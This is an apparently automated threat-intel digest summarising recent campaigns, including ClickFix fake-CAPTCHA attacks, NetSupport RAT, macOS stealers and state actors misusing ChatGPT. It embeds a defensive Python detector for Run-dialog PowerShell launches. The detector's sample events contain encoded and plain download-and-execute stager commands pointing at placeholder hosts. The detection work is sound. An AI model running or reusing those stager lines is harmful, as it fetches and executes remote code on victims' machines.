OpenBrief

Category: 🎯 Campaigns
AI-Powered Threat Intel Briefings

Top Stories

DDoS Attacks by Hacktivists Target Swedish Services
Recent DDoS attacks in Sweden, attributed to the pro-Russian group NoName057(16), highlight the challenges of responding to hacktivism. Experts suggest that overreacting to these incidents may inadvertently support the attackers' goals.

Key points:

  • Swedish services such as Swish and BankID have faced DDoS attacks recently.
  • The pro-Russian group NoName057(16) has claimed responsibility for attacks in Sweden and the Netherlands.
  • DDoS attacks are often seen as a form of hacktivism aimed at drawing attention to specific issues.
  • Experts recommend a measured response that avoids both blaming the victims and handing the attackers the attention they seek.
  • Media coverage has improved, providing context to reduce public panic during such incidents.
Sources: CSO Online (1 article)
New Phishing Campaign Uses Fake CAPTCHA to Deliver Malware via Clipboard Hijacking
A new phishing campaign employs fake CAPTCHA interfaces to trick users into executing malware commands via clipboard hijacking. This method circumvents traditional download prompts, exploiting user fatigue with security checks.

Key points:

  • Attackers clone Cloudflare's Turnstile CAPTCHA to deceive users into executing malicious commands.
  • Victims are guided to paste and run hidden PowerShell commands, leading to malware installation.
  • The campaign exploits user 'verification fatigue' by mimicking legitimate security checks.
  • Notable malware delivered includes information stealers like Lumma and remote access trojans like NetSupport Manager.
  • This technique has been adopted by various threat actors, including state-sponsored groups.
Sources: CSO Online (1 article)
Analysis of Vishing Threats Highlights Risks from Social Engineering
Organizations face increasing risks from vishing, a voice-based social engineering tactic used by threat actors like UNC3944 and UNC6040. These actors exploit trust to gain unauthorized access to sensitive information and systems, emphasizing the need for robust internal security measures.

Key points:

  • Vishing is increasingly used by financially motivated actors to manipulate employees into divulging sensitive information.
  • The group UNC3944 uses vishing to reset credentials and gain broader network access, while UNC6040 targets Salesforce data for exfiltration.
  • Organizations can enhance their defenses by understanding the tactics of these actors and conducting thorough internal assessments.
  • Mandiant's Red Team Assessments demonstrate the effectiveness of simulating vishing attacks to identify security weaknesses.
  • Open-source intelligence gathering is crucial for attackers to develop effective social engineering campaigns.
Sources: Google Cloud Threat Intel (1 article)
Hacktivism Evolves into Cybercrime: The Rise of Hybrid Threat Actors
The distinction between hacktivism and cybercrime is diminishing as groups like FunkSec and KillSec transition to financially motivated ransomware operations. This shift complicates threat attribution and response strategies for cybersecurity defenders.

Key points:

  • FunkSec, originally a hacktivist group, has transitioned to a ransomware-as-a-service model, claiming 172 victims.
  • KillSec, aligned with Anonymous, shifted from DDoS attacks to ransomware operations, launching tools for affiliates.
  • Both groups exemplify the convergence of ideologically driven actions with profit-oriented cybercrime.
  • This trend poses new challenges for cybersecurity professionals in attribution and mitigation efforts.
Sources: Rapid7 Research Blog (1 article)
Microsoft to Showcase AI-First Security Solutions at Gartner Summit
Microsoft will present its AI-first security platform at the Gartner Security & Risk Management Summit, highlighting innovations and insights on managing cybersecurity risks. Attendees can engage in sessions and one-on-one meetings with experts.

Key points:

  • The Gartner Security & Risk Management Summit will take place in June 2025, focusing on modern cybersecurity challenges.
  • Microsoft will offer two key sessions on AI in security and data governance with Microsoft Purview.
  • Attendees can book one-on-one meetings with Microsoft experts to discuss cybersecurity strategies and product capabilities.
  • The event aims to provide insights into managing risks in the evolving landscape of AI and quantum computing.
Sources: Microsoft Threat Intelligence Blog (1 article)

Other Updates

Fake Docusign and Gitcode Sites Distribute NetSupport RAT via PowerShell
Deceptive sites are spreading NetSupport RAT through malicious PowerShell scripts.

Key points:

  • Malicious PowerShell scripts are hosted on fake Gitcode and Docusign sites.
  • Users are deceived into executing scripts that download and install NetSupport RAT.
  • Clipboard poisoning is used to facilitate script execution via CAPTCHA verifications.
  • The attack employs multiple stages to evade detection and enhance resilience.
  • Similar techniques were noted in a previous SocGholish campaign.
Sources: The Hacker News (1 article)
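Both this item and the fake CAPTCHA item under Top Stories end the same way: the victim pastes a clipboard-planted PowerShell one-liner into the Run dialog, so the interpreter is spawned by explorer.exe, typically with a hidden window and an encoded or download-and-execute payload. As an added illustration that is not part of the original briefing or its sources, the Python below triages process-creation telemetry for that shape. The sample events, field names and domains are constructed, and the scoring heuristics are assumptions of this example rather than any vendor's published rule.

```python
import base64
import binascii
import os
import re
from typing import Dict, List, Optional

# Indicators of the ClickFix / fake-CAPTCHA launch pattern (heuristics assumed here):
#   - PowerShell spawned by explorer.exe (the Run dialog is hosted by explorer)
#   - hidden window, execution-policy bypass, -EncodedCommand
#   - download-and-execute cmdlets in the raw or decoded command line
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)
PAYLOAD_RE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|net\.webclient|invoke-webrequest|\biwr\b|mshta",
    re.I,
)


def encode_ps_command(text: str) -> str:
    """Encode text the way -EncodedCommand expects (UTF-16LE, base64).
    Used only to build the constructed sample event below."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event (fields: parent, image, cmdline)."""
    cmdline = event["cmdline"]
    reasons: List[str] = []
    parent = os.path.basename(event["parent"].replace("\\", "/")).lower()
    if parent == "explorer.exe":
        reasons.append("parent-explorer")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden-window")
    if BYPASS_RE.search(cmdline):
        reasons.append("policy-bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    if PAYLOAD_RE.search(cmdline) or (decoded and PAYLOAD_RE.search(decoded)):
        reasons.append("download-exec")
    # A bare console opened from explorer is normal; require a second indicator.
    suspicious = ("parent-explorer" in reasons and len(reasons) >= 2) or (
        "download-exec" in reasons and bool({"hidden-window", "encoded-command"} & set(reasons))
    )
    return {"cmdline": cmdline, "decoded": decoded, "reasons": reasons, "suspicious": bool(suspicious)}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the analyses of all events that match the pattern."""
    return [r for r in (analyze_event(e) for e in events) if r["suspicious"]]


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not real captures); domains are reserved .invalid names.
SAMPLE_EVENTS = [
    {   # Run-dialog launch, hidden window, encoded download-and-execute stager
        "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe -w hidden -ep bypass -enc "
        + encode_ps_command("iex (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')"),
    },
    {   # same pattern without encoding
        "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
        "cmdline": 'powershell -w hidden -c "iwr http://verify.example.invalid/x | iex"',
    },
    {   # user opens a console from the Start menu: explorer parent, nothing else
        "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe",
    },
    {   # scheduled admin script launched from cmd.exe
        "parent": r"C:\Windows\System32\cmd.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ops\\rotate-logs.ps1",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(", ".join(hit["reasons"]), "->", hit["decoded"] or hit["cmdline"])
```

Run as a script it reports the two staged launches and stays quiet on the two benign events. The decoded payload is kept in the result so an analyst can read the stager URL without re-decoding by hand; in production the same logic would sit over Sysmon Event ID 1 or equivalent EDR process events, and the explorer.exe parent check is what separates this pattern from ordinary interactive PowerShell use.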
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
A campaign leveraging ClickFix tactics targets macOS users with the Atomic macOS Stealer malware.

Key points:

  • The campaign uses fake Spectrum domains to lure users into downloading AMOS.
  • Malicious shell scripts are executed to steal passwords and download further payloads.
  • Russian-speaking cybercriminals are suspected due to language artifacts in the malware.
  • ClickFix tactics are increasingly used to deliver various malware types, including trojans and ransomware.
  • Multiple attacks have been identified across EMEA and the U.S., indicating a growing trend.
Sources: The Hacker News (1 article)
Malicious Browser Extensions Target 722 Users in Latin America Since Early 2025
A campaign has infected 722 users with malicious browser extensions, focusing on Brazilian targets.

Key points:

  • The campaign, named Operation Phantom Enigma, has affected users in Brazil, Colombia, and other countries.
  • Attackers used phishing emails disguised as invoices to deploy malicious extensions for Chromium-based browsers.
  • The malicious extensions were designed to siphon user authentication data from banking websites.
  • The attackers leveraged compromised company servers to increase the likelihood of successful phishing attempts.
  • Detected malicious extensions have been removed from the Chrome Web Store.
Sources: The Hacker News (1 article)
OpenAI Bans ChatGPT Accounts Linked to State-Backed Hacking and Disinformation
Malicious actors exploited ChatGPT for cyber operations, including fake resumes and misinformation campaigns.

Key points:

  • OpenAI identified 10 malicious operations using ChatGPT for social engineering and malware campaigns.
  • Four campaigns were likely linked to Chinese actors, while others involved Russian trolls generating election misinformation.
  • Threat actors created fake IT worker personas and auto-generated resumes to facilitate cyber operations.
  • A Russian actor developed malware named ScopeCreep using ChatGPT, employing advanced operational security measures.
  • The malware was distributed via a spoofed legitimate tool, showcasing the evolving misuse of AI in cybercrime.
Sources: The Record by Recorded Future (1 article)
US Offers $10M Reward for Information on RedLine Malware Developer
The US is incentivizing information on RedLine malware developer Maxim Rudometov with a $10 million reward.

Key points:

  • The US State Department is administering a $10 million reward for information on Maxim Rudometov, linked to the RedLine malware.
  • Rudometov, believed to be in Krasnodar, Russia, developed RedLine, which has infected millions since 2020.
  • He sold RedLine as malware-as-a-service, enabling cybercriminals to conduct their own attacks.
  • Rudometov faces criminal charges related to the use and distribution of RedLine and Meta malware strains.
  • The malware is known for stealing personal, financial, and cryptocurrency information from victims.
Sources: The Register Security (1 article)
China Claims Taiwan Operates Ineffective APT Groups with US Support
China's report critiques Taiwan's APT groups as ineffective and reliant on known vulnerabilities.

Key points:

  • China identifies five APT groups allegedly linked to Taiwan, including APT-C-65 and APT-C-67.
  • The report claims these groups primarily use phishing and known vulnerabilities for attacks.
  • China asserts that the APT groups lack advanced capabilities and rely on public resources.
  • The report suggests that their anti-tracing methods are weak, making attribution easier.
  • China's cybersecurity agencies co-authored the report, which also critiques US involvement.
Sources: The Register Security (1 article)
Mikko Hyppönen Shifts Focus from Cybersecurity to Drone Warfare Amid Ukraine Conflict
Mikko Hyppönen pivots to drone technology, citing the Ukraine war's impact on modern warfare.

Key points:

  • Hyppönen has over 34 years of experience in cybersecurity, previously with F-Secure.
  • He will join Sensofusion, focusing on anti-drone technology and systems.
  • The Ukraine conflict has highlighted the significant role of drones in warfare.
  • Hyppönen draws parallels between drone security and cybersecurity threats.
  • He predicts a future with fully autonomous drones making combat decisions.
Sources: The Register Security (1 article)

Additional Signals

No additional signals worth mentioning in this category from the past 72 hours.